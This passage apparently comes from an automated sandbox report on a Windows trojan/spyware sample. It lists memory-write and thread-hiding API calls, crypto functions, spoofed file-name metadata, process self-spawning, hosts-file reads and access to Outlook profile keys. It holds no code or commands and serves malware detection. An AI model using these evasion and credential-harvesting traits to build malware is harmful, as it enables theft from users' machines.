Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76843 NtWriteVirtualMemory,	0_2_02A76843
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E1BC NtSetInformationThread,	0_2_02A7E1BC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A771E7 NtWriteVirtualMemory,	0_2_02A771E7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A761F4 NtWriteVirtualMemory,	0_2_02A761F4
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E16C NtSetInformationThread,	0_2_02A7E16C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76976 NtWriteVirtualMemory,	0_2_02A76976
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77143 NtWriteVirtualMemory,	0_2_02A77143
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A766F7 NtWriteVirtualMemory,	0_2_02A766F7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DED7 NtSetInformationThread,	0_2_02A7DED7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76647 NtWriteVirtualMemory,	0_2_02A76647
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7D64C NtProtectVirtualMemory,	0_2_02A7D64C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DE54 NtSetInformationThread,	0_2_02A7DE54
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A767EC NtWriteVirtualMemory,	0_2_02A767EC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75709 NtWriteVirtualMemory,	0_2_02A75709
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76F1F NtWriteVirtualMemory,	0_2_02A76F1F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DF5F NtSetInformationThread,	0_2_02A7DF5F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DC93 NtSetInformationThread,	0_2_02A7DC93
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A764EB NtWriteVirtualMemory,	0_2_02A764EB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A784CF NtAllocateVirtualMemory,	0_2_02A784CF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DCCA NtSetInformationThread,	0_2_02A7DCCA
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78423 NtAllocateVirtualMemory,	0_2_02A78423
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DC33 NtSetInformationThread,	0_2_02A7DC33
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76432 NtWriteVirtualMemory,	0_2_02A76432
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76C6A NtWriteVirtualMemory,	0_2_02A76C6A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BC75 NtWriteVirtualMemory,LoadLibraryA,	0_2_02A7BC75
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75D82 NtWriteVirtualMemory,	0_2_02A75D82
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76582 NtWriteVirtualMemory,	0_2_02A76582
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DDD3 NtSetInformationThread,	0_2_02A7DDD3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DD07 NtSetInformationThread,	0_2_02A7DD07
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77502 NtWriteVirtualMemory,	0_2_02A77502
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76D0F NtWriteVirtualMemory,	0_2_02A76D0F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7751A NtWriteVirtualMemory,	0_2_02A7751A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78577 NtAllocateVirtualMemory,	0_2_02A78577
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7A576 NtWriteVirtualMemory,	0_2_02A7A576
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DD4C NtSetInformationThread,	0_2_02A7DD4C

Detected potential crypto function

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7423B	0_2_02A7423B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A783F0	0_2_02A783F0
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7100B	0_2_02A7100B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7B072	0_2_02A7B072
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70919	0_2_02A70919
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77E96	0_2_02A77E96
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DC22	0_2_02A7DC22
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762AE	0_2_02A762AE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7828E	0_2_02A7828E
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77293	0_2_02A77293
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A742E7	0_2_02A742E7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A752EE	0_2_02A752EE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762F2	0_2_02A762F2
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75AC1	0_2_02A75AC1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A762C1	0_2_02A762C1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A722D4	0_2_02A722D4
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CADF	0_2_02A7CADF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78ADE	0_2_02A78ADE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A782DC	0_2_02A782DC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71AD8	0_2_02A71AD8
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A72227	0_2_02A72227
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7122B	0_2_02A7122B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74A2B	0_2_02A74A2B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73232	0_2_02A73232
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78A3E	0_2_02A78A3E
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7623A	0_2_02A7623A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71209	0_2_02A71209
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71275	0_2_02A71275
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CA44	0_2_02A7CA44
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7424C	0_2_02A7424C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7B256	0_2_02A7B256
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71A54	0_2_02A71A54
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A713BF	0_2_02A713BF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7438F	0_2_02A7438F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76B8F	0_2_02A76B8F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76397	0_2_02A76397
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73BE1	0_2_02A73BE1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7D3E0	0_2_02A7D3E0
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A753EF	0_2_02A753EF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A773F6	0_2_02A773F6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A713FF	0_2_02A713FF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78BFF	0_2_02A78BFF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70BFA	0_2_02A70BFA
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A763C1	0_2_02A763C1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77BC0	0_2_02A77BC0
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75BCF	0_2_02A75BCF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BB25	0_2_02A7BB25
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75B23	0_2_02A75B23
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71328	0_2_02A71328
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78305	0_2_02A78305
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70B0E	0_2_02A70B0E
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7A30B	0_2_02A7A30B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CB66	0_2_02A7CB66
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73B63	0_2_02A73B63
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78B6F	0_2_02A78B6F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71B6B	0_2_02A71B6B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75347	0_2_02A75347
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70B43	0_2_02A70B43
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73B57	0_2_02A73B57
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77357	0_2_02A77357
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75B52	0_2_02A75B52
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A710A6	0_2_02A710A6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A718A6	0_2_02A718A6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A758A4	0_2_02A758A4
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A748B7	0_2_02A748B7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C8BF	0_2_02A7C8BF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7188F	0_2_02A7188F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7208F	0_2_02A7208F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7D0E4	0_2_02A7D0E4
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A720E3	0_2_02A720E3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A710F3	0_2_02A710F3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E0CB	0_2_02A7E0CB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E8D5	0_2_02A7E8D5
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A768DB	0_2_02A768DB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7100E	0_2_02A7100E
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7E016	0_2_02A7E016
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71012	0_2_02A71012
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C818	0_2_02A7C818
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71071	0_2_02A71071
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71871	0_2_02A71871
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77078	0_2_02A77078
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76843	0_2_02A76843
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C054	0_2_02A7C054
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A719B1	0_2_02A719B1
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7318B	0_2_02A7318B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74990	0_2_02A74990
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A771E7	0_2_02A771E7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A789EE	0_2_02A789EE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A761F4	0_2_02A761F4
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74926	0_2_02A74926
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7312F	0_2_02A7312F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7093C	0_2_02A7093C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C93A	0_2_02A7C93A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71967	0_2_02A71967
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71165	0_2_02A71165
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76976	0_2_02A76976
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77143	0_2_02A77143
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7214F	0_2_02A7214F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A706A3	0_2_02A706A3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73EB3	0_2_02A73EB3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71E86	0_2_02A71E86
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7469F	0_2_02A7469F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A766F7	0_2_02A766F7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DED7	0_2_02A7DED7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70623	0_2_02A70623
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7B629	0_2_02A7B629
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A72E3F	0_2_02A72E3F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71E67	0_2_02A71E67
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BE63	0_2_02A7BE63
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7B677	0_2_02A7B677
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74E7B	0_2_02A74E7B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76647	0_2_02A76647
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71644	0_2_02A71644
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70640	0_2_02A70640
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71654	0_2_02A71654
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DE54	0_2_02A7DE54
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BFA7	0_2_02A7BFA7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C787	0_2_02A7C787
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A767EC	0_2_02A767EC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71FFB	0_2_02A71FFB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A747FB	0_2_02A747FB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CFF8	0_2_02A7CFF8
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A717C7	0_2_02A717C7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71F37	0_2_02A71F37
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BF3F	0_2_02A7BF3F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BF02	0_2_02A7BF02
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C70C	0_2_02A7C70C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7570B	0_2_02A7570B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75709	0_2_02A75709
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71717	0_2_02A71717
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76F1F	0_2_02A76F1F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73F6B	0_2_02A73F6B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7177A	0_2_02A7177A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74744	0_2_02A74744
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DF5F	0_2_02A7DF5F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78CA7	0_2_02A78CA7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73CA2	0_2_02A73CA2
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CCAC	0_2_02A7CCAC
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70CB2	0_2_02A70CB2
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71CBE	0_2_02A71CBE
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70497	0_2_02A70497
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DC93	0_2_02A7DC93
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A764EB	0_2_02A764EB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CCF6	0_2_02A7CCF6
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A784CF	0_2_02A784CF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DCCA	0_2_02A7DCCA
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A704D7	0_2_02A704D7
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A78423	0_2_02A78423
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A74433	0_2_02A74433
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DC33	0_2_02A7DC33
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76432	0_2_02A76432
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73C38	0_2_02A73C38
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CC0B	0_2_02A7CC0B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71C13	0_2_02A71C13
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71463	0_2_02A71463
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7546B	0_2_02A7546B
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76C6A	0_2_02A76C6A
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BC77	0_2_02A7BC77
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BC75	0_2_02A7BC75
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7C448	0_2_02A7C448
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CC53	0_2_02A7CC53
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73C5D	0_2_02A73C5D
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A72DA3	0_2_02A72DA3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7CDA3	0_2_02A7CDA3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A735B8	0_2_02A735B8
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A75D82	0_2_02A75D82
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76582	0_2_02A76582
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A77597	0_2_02A77597
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71592	0_2_02A71592
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BD98	0_2_02A7BD98
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73DFF	0_2_02A73DFF
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DDD3	0_2_02A7DDD3
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A745DB	0_2_02A745DB
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A72D30	0_2_02A72D30
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7BD07	0_2_02A7BD07
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DD07	0_2_02A7DD07
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7450F	0_2_02A7450F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A76D0F	0_2_02A76D0F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A71D68	0_2_02A71D68
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7A576	0_2_02A7A576
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A73D43	0_2_02A73D43
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A70D4F	0_2_02A70D4F
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7DD4C	0_2_02A7DD4C
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Code function: 0_2_02A7455F	0_2_02A7455F

PE file contains strange resources

Source: 8rbuJ8Ycv1.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8rbuJ8Ycv1.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: 8rbuJ8Ycv1.exe, 00000000.00000002.886988620.0000000000435000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIncompr3.exe vs 8rbuJ8Ycv1.exe
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1729045404.0000000002550000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs 8rbuJ8Ycv1.exe
Source: 8rbuJ8Ycv1.exe, 00000010.00000000.886205140.0000000000435000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIncompr3.exe vs 8rbuJ8Ycv1.exe
Source: 8rbuJ8Ycv1.exe, 00000010.00000002.1729078192.00000000025A0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs 8rbuJ8Ycv1.exe
Source: 8rbuJ8Ycv1.exe	Binary or memory string: OriginalFilenameIncompr3.exe vs 8rbuJ8Ycv1.exe

Uses 32bit PE files

Source: 8rbuJ8Ycv1.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@570/3

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

File created: C:\Users\user\AppData\Local\Temp\~DF37E05158786A46FB.TMP

Jump to behavior

Source: 8rbuJ8Ycv1.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 8rbuJ8Ycv1.exe

ReversingLabs: Detection: 41%

Source: unknown	Process created: C:\Users\user\Desktop\8rbuJ8Ycv1.exe 'C:\Users\user\Desktop\8rbuJ8Ycv1.exe'
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process created: C:\Users\user\Desktop\8rbuJ8Ycv1.exe 'C:\Users\user\Desktop\8rbuJ8Ycv1.exe'
Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe	Process created: C:\Users\user\Desktop\8rbuJ8Ycv1.exe 'C:\Users\user\Desktop\8rbuJ8Ycv1.exe'	Jump to behavior

Source: C:\Users\user\Desktop\8rbuJ8Ycv1.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

